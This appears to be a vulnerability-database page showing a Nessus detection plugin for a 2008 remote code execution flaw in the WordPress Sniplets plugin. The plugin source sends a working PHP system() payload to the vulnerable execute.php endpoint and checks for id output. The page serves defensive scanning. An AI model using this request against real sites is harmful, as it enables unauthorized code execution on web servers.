
Sniplets Plugin for WordPress execute.php 'text' Parameter Arbitrary Command Execution


7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

7 High

AI Score

Confidence

High

0.013 Low

EPSS

Percentile

85.7%

The remote host is running Sniplets, a third-party text insertion plugin for WordPress.

The version of Sniplets installed on the remote host takes user input from the ‘text’ parameter of the ‘modules/execute.php’ script and passes it to an ‘eval()’ statement. Provided that PHP’s ‘register_globals’ setting is enabled, an unauthenticated remote attacker can leverage this issue to execute arbitrary code on the remote host with the privileges of the web server user id.

Note that the Sniplets plugin is also reportedly affected by cross-site scripting and remote file inclusion vulnerabilities;
however, Nessus has not tested for these.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

# Plugin metadata. This branch ends with exit(0), so when the scanner
# evaluates the plugin in description mode nothing below it is executed.
if (description)
{
  script_id(31167);
  script_version("1.24");
  script_set_attribute(attribute:"plugin_modification_date", value:"2024/06/05");

  script_cve_id("CVE-2008-1060");
  script_bugtraq_id(27985);
  script_xref(name:"EDB-ID", value:"5194");
  script_xref(name:"Secunia", value:"29099");

  script_name(english:"Sniplets Plugin for WordPress execute.php 'text' Parameter Arbitrary Command Execution");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that allows arbitrary
command execution.");
  script_set_attribute(attribute:"description", value:
"The remote host is running Sniplets, a third-party text insertion
plugin for WordPress.

The version of Sniplets installed on the remote host passes user input
to the 'text' parameter of the 'modules/execute.php' script before
passing it to an 'eval()' statement. Provided that PHP's
'register_globals' setting is enabled, an unauthenticated remote
attacker can leverage this issue to execute arbitrary code on the
remote host subject to the privileges of the web server user id.

Note that the Sniplets plugin is also reportedly affected by
cross-site scripting and remote file inclusion vulnerabilities;
however, Nessus has not tested for these.");
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/488734");
  script_set_attribute(attribute:"see_also", value:"https://wordpress.org/plugins/sniplets/#changelog");
  script_set_attribute(attribute:"solution", value:
"Upgrade to version 1.2.3 or later.");
  # CVSSv2 access complexity is Medium here because exploitation depends on
  # the target's register_globals setting (see the description above).
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:"CANVAS");
  # CWE-94: Improper Control of Generation of Code ('Code Injection').
  script_cwe_id(94);

  script_set_attribute(attribute:"vuln_publication_date", value:"2008/02/25");
  script_set_attribute(attribute:"patch_publication_date", value:"2008/02/29");
  script_set_attribute(attribute:"plugin_publication_date", value:"2008/02/26");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:sniplets_plugin");
  script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
  script_end_attributes();

  # ACT_ATTACK: the check below sends a request that makes the target
  # evaluate injected input, so this is not a passive/safe check.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008-2024 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # Relies on wordpress_detect.nasl having populated installed_sw/WordPress;
  # www/PHP must also be set, and the scan-wide CGI-scanning opt-out is honoured.
  script_dependencies("wordpress_detect.nasl");
  script_require_keys("installed_sw/WordPress", "www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
include("webapp_func.inc");
include("data_protection.inc");

# Locate the WordPress install this plugin check applies to.
app = "WordPress";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(app_name:app, port:port);

dir = install['path'];
install_url = build_url(port:port, qs:dir);

plugin = "Sniplets";

# Reuse a previous detection result for this plugin if one has been
# recorded in the KB for this port and directory.
installed = get_kb_item("www/"+port+"/webapp_ext/"+plugin+" under "+dir);

if (!installed)
{
  # No prior result: fingerprint the plugin by fetching one of its static
  # files and matching a string that identifies it.
  plugins_dir = "/wp-content/plugins/";
  fingerprints = make_array();
  fingerprints[plugins_dir + "sniplets/resource/admin.js"][0] = make_list('function setupSniplets');

  installed = check_webapp_ext(checks:fingerprints, dir:dir, port:port, ext:plugin);
}

# Stop here if the plugin is absent; nothing below makes sense without it.
if (!installed)
  audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + " plugin");

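# Try to exploit the flaw to run a command.
cmd = "id";
exploit = "<?php system(" +cmd+ ");";

w = http_send_recv3(
  method:"GET",
  item: dir + "/wp-content/plugins/sniplets/modules/execute.php?text=" +
    urlencode(str:exploit),
  port:port,
  exit_on_fail:TRUE
);
res = w[2];

# Match the response once and reuse the result in both the decision
# and the report, rather than running the same egrep three times.
# Output that looks like it came from id(1)...
id_output = egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res);
# ...or PHP's disable_functions preventing system() from running; the
# warning is still taken as evidence that the submitted input was evaluated.
system_disabled = egrep(pattern:"Warning.+ has been disabled for security reasons", string:res);

# There's a problem if either signal is present.
if (id_output || system_disabled)
{
  # Only include command output in the report when verbose reporting is on
  # and we actually have id output to show; uid values are sanitized.
  if (report_verbosity > 0 && id_output)
  {
    report =
      '\n' +
      'Nessus was able to execute the command "' +  cmd + '" on the remote\n' +
      'host to produce the following results :\n' +
      '\n' +
      "  " + data_protection::sanitize_uid(output:id_output);
    security_warning(port:port, extra:report);
  }
  else security_warning(port);
  exit(0);
}
audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + " plugin");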
VendorProductVersionCPE
wordpresswordpresscpe:/a:wordpress:wordpress
wordpresssniplets_plugincpe:/a:wordpress:sniplets_plugin
